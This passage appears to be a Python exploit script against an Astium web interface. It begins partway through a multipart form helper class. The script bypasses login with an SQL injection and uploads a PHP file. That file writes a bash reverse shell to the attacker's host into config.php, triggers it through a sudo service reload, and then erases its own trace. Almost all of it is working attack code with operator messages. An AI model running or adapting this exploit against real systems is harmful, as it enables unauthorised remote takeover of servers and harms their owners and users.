def add_field(self, name, value):
"""Add a simple field to the form data."""
self.form_fields.append((name, value))
return
def add_file(self, fieldname, filename, fileHandle, mimetype=None):
"""Add a file to be uploaded."""
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return
def __str__(self):
"""Return a string representing the form data, including attached files."""
# Build a list of lists, each containing "lines" of the
# request. Each part is separated by a boundary string.
# Once the list is built, return a string where each
# line is separated by '\r\n'.
parts = []
part_boundary = '--' + self.boundary
# Add the form fields
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
# Add the files to upload
parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)
# Flatten the list and add closing boundary marker,
# then return CR+LF separated data
flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)
# PHP script to write our reverse shell to the /usr/local/astium/web/php/config.php script.
phpScript='''<?php
$f = fopen("/usr/local/astium/web/php/config.php", "a");
fwrite($f, "\\n<?php system('/bin/bash -i >& /dev/tcp/%s/%s 0>&1'); ?>");
fclose($f);
system("sudo /sbin/service astcfgd reload");
// Sleep 1 minute, so that we have enough time for the reload to trigger our reverse shell
sleep(60);
$lines = file('/usr/local/astium/web/php/config.php');
// Delete last 2 lines (containing our reverse shell) of the config.php file, else the web interface won't work anymore after our exploit.
array_pop($lines);
array_pop($lines);
$file = join('', $lines);
$file_handle = fopen('/usr/local/astium/web/php/config.php', 'w');
fputs($file_handle, $file);
fclose($file_handle);
?>''' % (lhost, lport)
# Create a random file with 8 characters
filename = ''
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',8):
filename+=i
filename +=".php"
# Create the form with simple fields
form = MultiPartForm()
form.add_field('__act', 'submit')
# SQL Injection to bypass login
SQLiAuthBypass = "system' OR 1='1"
# Our Cookie Jar
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
print "[*] Opening index.php to get Cookies"
# Just open the url to grab the cookies and put them in the jar
resp = opener.open("http://%s/en/content/index.php" %rhost)
print "[*] Sending evil SQLi authentication bypass payload"
# Set our post parameters and bypass the logon.php with our SQL Injection
post_params = urllib.urlencode({'__act' : 'submit', 'user_name' : SQLiAuthBypass, 'pass_word' : 'pwned', 'submit' : 'Login'})
resp = opener.open("http://%s/en/logon.php" %rhost, post_params)
print "[*] Uploading PHP script " + filename + " to inject PHP code in '/usr/local/astium/web/php/config.php' and run a 'sudo /sbin/service astcfgd reload' to create a reverse shell"
# Create our multi-part body + headers file upload request
resp = urllib2.Request("http://%s/en/database/import.php" % rhost)
body = str(form)
resp.add_header('Content-type', form.get_content_type())
resp.add_header('Content-length', len(body))
resp.add_data(body)
request = opener.open(resp).read()
print "[*] Executing remote PHP script. Check your netcat shell. NOTE: this can take up to 1-2 minutes before it spawns a shell\n"
# Simple GET request to execute the script on the remote server
resp = opener.open("http://%s/upload/%s" % (rhost, filename))
